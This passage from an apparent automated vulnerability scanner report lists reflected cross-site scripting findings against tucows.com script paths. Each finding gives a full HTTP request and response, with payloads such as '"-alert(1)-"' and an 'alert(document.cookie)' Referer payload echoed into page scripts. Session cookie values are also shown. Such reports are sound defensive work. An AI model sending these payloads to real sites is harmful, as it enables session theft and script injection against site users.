Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes49df9"-alert(1)-"7cec1abd243/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.349. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63f1c"-alert(1)-"5f5b3393d9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js63f1c"-alert(1)-"5f5b3393d9b/aalib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js63f1c"-alert(1)-"5f5b3393d9b/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.350. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82b97"-alert(1)-"d0e2ad1d532 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/aalib.js82b97"-alert(1)-"d0e2ad1d532 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/aalib.js82b97"-alert(1)-"d0e2ad1d532";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.351. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccea9"-alert(1)-"cd05073d4ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesccea9"-alert(1)-"cd05073d4ca/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesccea9"-alert(1)-"cd05073d4ca/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.352. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87352"-alert(1)-"0f2157d1bbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js87352"-alert(1)-"0f2157d1bbf/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js87352"-alert(1)-"0f2157d1bbf/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.353. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3034"-alert(1)-"04ca174d04c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/ajaxlib.jse3034"-alert(1)-"04ca174d04c HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/ajaxlib.jse3034"-alert(1)-"04ca174d04c";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.354. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5361f"-alert(1)-"5652dc7710f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes5361f"-alert(1)-"5652dc7710f/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes5361f"-alert(1)-"5652dc7710f/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.355. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38e1"-alert(1)-"042603f8178 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/jsb38e1"-alert(1)-"042603f8178/show_layer.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/jsb38e1"-alert(1)-"042603f8178/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.356. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82ec8"-alert(1)-"817640c3898 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/show_layer.js82ec8"-alert(1)-"817640c3898 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/show_layer.js82ec8"-alert(1)-"817640c3898";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.357. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da601"-alert(1)-"3c77224e1a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesda601"-alert(1)-"3c77224e1a9/js/signupin.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesda601"-alert(1)-"3c77224e1a9/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.358. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e58a"-alert(1)-"92953272be5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js7e58a"-alert(1)-"92953272be5/signupin.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:44 GMT
